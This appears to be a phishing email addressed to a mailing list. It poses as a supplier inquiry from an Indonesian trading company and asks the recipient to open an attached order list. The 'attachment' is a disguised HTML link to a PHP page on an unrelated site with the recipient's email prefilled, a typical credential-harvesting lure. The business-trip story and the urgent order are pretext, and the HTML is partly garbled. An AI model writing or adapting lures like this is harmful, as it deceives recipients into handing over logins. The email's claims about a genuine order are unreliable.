Dear Seller,
                      I was on a business trip after i left china, hence my
delayed response. I have put our order together.
 I just resumed work and we are outsourcing of supplies to a number of
Manufacturers and wholesalers, for reason of excessive demand,
our suppliers have requested  for extra help in production lines. You can view
the Excel file for samples we are
interested in, i have included pictures of the samples

Check our order list as attached and quote accordingly.
 Note: If you don't have capacity for the production, please specify and let us
know
 Thanks and regards

 CV. Alfa Media Utama
 Jl. Masjid Al Khairot
No 26D, Batu Ampar,
Kramat Jati Jakarta Timur DKI
Jakarta 13520
Indonesia
Telephone�1A62-21-30376954

        PO20091<A class=auto-style25 style="TEXT-DECORATION: none;
FONT-VARIANT: normal; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM:
none; FONT-WEIGHT: normal; COLOR: rgb(51,102,204); FONT-STYLE: normal;
LETTER-SPACING: normal; LINE-HEIGHT: 20px; TEXT-INDENT: 0px;
-webkit-text-stroke-width: 0px"
href="http://speedstream.tv/custom/pages/index.php?email=pressemeldungen@lists.wikimedia.org";
 target=ServletWIN sans-serif;?="" [8BO53?,="">.xls  |  1 file  (total 809.9
KB)               VIEW | DOWNLOAD